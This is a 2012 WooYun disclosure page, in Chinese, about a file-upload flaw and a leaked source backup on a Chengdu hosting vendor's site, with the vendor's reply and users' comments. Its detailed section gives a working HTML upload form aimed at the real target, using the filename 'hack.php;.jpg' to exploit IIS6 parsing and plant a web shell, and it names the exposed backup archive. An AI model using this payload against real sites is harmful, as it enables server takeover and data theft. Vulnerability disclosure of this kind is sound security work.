当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09817

漏洞标题:世纪东方建站超市上传漏洞+源码泄漏

相关厂商:成都世纪东方

漏洞作者: 数据流

提交时间:2012-07-18 00:48

修复时间:2012-09-01 00:48

公开时间:2012-09-01 00:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-18: 细节已通知厂商并且等待厂商处理中
2012-07-18: 厂商已经确认,细节仅向厂商公开
2012-07-28: 细节向核心白帽子及相关领域专家公开
2012-08-07: 细节向普通白帽子公开
2012-08-17: 细节向实习白帽子公开
2012-09-01: 细节向公众公开

简要描述:

晚上无聊 随便找了个乌云厂商 ---成都世纪东方建站超市站点.. 你们作为一个空间 域名商 安全是很重要的!!!希望你们能注意!

详细说明:

目标:

http://jzcs.51web.com/


先注册个用户..
进入互助问答

http://jzcs.51web.com/maq/class/


下面有上传啊 哈.
直接本地构造个表单 可以使上传文件任意名(后缀必须是jpg什么的).,利用IIS6解析就行了..这是PHPWEB的一个0day啦 很多人都知道..

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://jzcs.51web.com/maq/upload.php">
<input type="text" name="fileName" value="hack.php;.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="FUCK" />
</form>


本地打开 直接上传个伪图片马马


提交表单后就能看见可爱的马马地址了..
http://jzcs.51web.com/wwwroot.rar 不解释...

漏洞证明:



神马会员都有了.嘻嘻

修复方案:

1:删除根目录的网站备份文件
2:PHPWEB漏洞N多 建议把站都换了.别用这程序

版权声明:转载请注明来源 数据流@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-07-18 08:29

厂商回复:

感谢提交,我们立即跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-18 00:49 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @xsser 我哭啊 上传错图片了...最后一张不是啊!!! @成都世纪东方

  2. 2012-07-18 01:02 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @数据流 兄弟你怎能么每天晚上都无聊呢?!妹子呢?

  3. 2012-07-18 01:16 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @风萧萧 放暑假了..妹子在家啊

  4. 2012-07-18 01:53 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @数据流 要啥妹子!搞基吧!

  5. 2012-07-18 02:28 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    你们几个蛋疼的木JJ

  6. 2012-07-18 02:58 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @GuoKer(ZhuLiu)搞基否?

  7. 2012-07-18 11:49 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @GuoKer(ZhuLiu) ,@风萧萧,@xsser @成都世纪东方 WEBSHELL都拿下了才给8分..是不是给你们挂个黑页,托个数据库才重视啊?

  8. 2012-07-18 13:36 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    @数据流 呵呵,是哦.......shell都拿下了,这分也太少了吧....

  9. 2012-07-19 08:16 | 成都世纪东方(乌云厂商)

    感谢各位的关注,此评分首先参照同类漏洞评分水准,其次结合难度系数等因素,如有不妥之处欢迎批评指正。^^